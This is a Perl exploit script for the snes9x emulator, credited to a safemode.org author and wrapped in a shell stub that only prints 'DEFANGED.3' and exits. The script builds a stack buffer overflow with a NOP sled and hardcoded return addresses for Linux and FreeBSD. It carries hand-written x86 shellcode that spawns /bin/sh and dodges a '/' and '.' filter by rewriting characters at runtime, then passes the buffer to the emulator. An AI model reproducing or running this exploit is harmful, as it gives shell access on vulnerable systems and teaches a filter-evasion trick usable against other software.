#!/bin/sh
echo DEFANGED.3
exit
#!/usr/bin/perl
#
# snes9x exploit written by zillion@safemode.org
#
# (safemode.org)
 
while($_ = $ARGV[0], /^-/) {
    shift; 
    last if /^--$/;
    /^-l/ && do { $esp = 0xbfffaadc; };
    /^-f/ && do { $esp = 0xbfbfab4c; };
} 

if(!$esp) {

&usage;

}


#############################################################################
# Home brewn shellcode that does an execve of /bin/sh. Because the buffer 
# if being filtered for '/' and '.' the shellcode has -bin-sh in it. The '-'
# chars are changed to '/' at runtime ! (hint, check inc and man ascii) 


$shellcode = 
        "\xeb\x33\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d".
        "\x5e\x08\x89\x5e\x0f\x89\x46\x13\x8a\x06\xfe\xc0\xfe\xc0\x88".
        "\x06\x8a\x46\x04\xfe\xc0\xfe\xc0\x88\x46\x04\xb0\x0b\x89\xf3".
        "\x8d\x4e\x0b\x8d\x56\x13\xcd\x80\xe8\xc8\xff\xff\xff\x2d\x62".
        "\x69\x6e\x2d\x73\x68\x23\x2d\x69\x23\x41\x41\x41\x41\x42\x42".
        "\x42\x42\x43\x43\x43\x43";



#############################################################################
# Preparation of the stuff we will put in our buffer 


$buf = 87;    
$rest = 4002; 
$nop = "\x90";
$offset = 1000; 

for ($i = 0; $i < ($buf - 16); $i++) {
    $buffer .= $nop;
}

$new_ret = pack('l', ($esp + $offset));

for ($i = 0; $i < 16; $i += 4) {
    $buffer .= $new_ret;
}


for ($i = 0; $i < ($rest - length($shellcode)); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;


#############################################################################
# Done ! now let kick some ass ! 


print("New return address: 0x", sprintf('%lx',($esp + $offset)), "\n");

exec("./snes9x '$buffer'");

sub usage {
    
    print "\nLinux usage:   $0 -l\nFreeBSD usage: $0 -f\n\n";
    exit;
    
}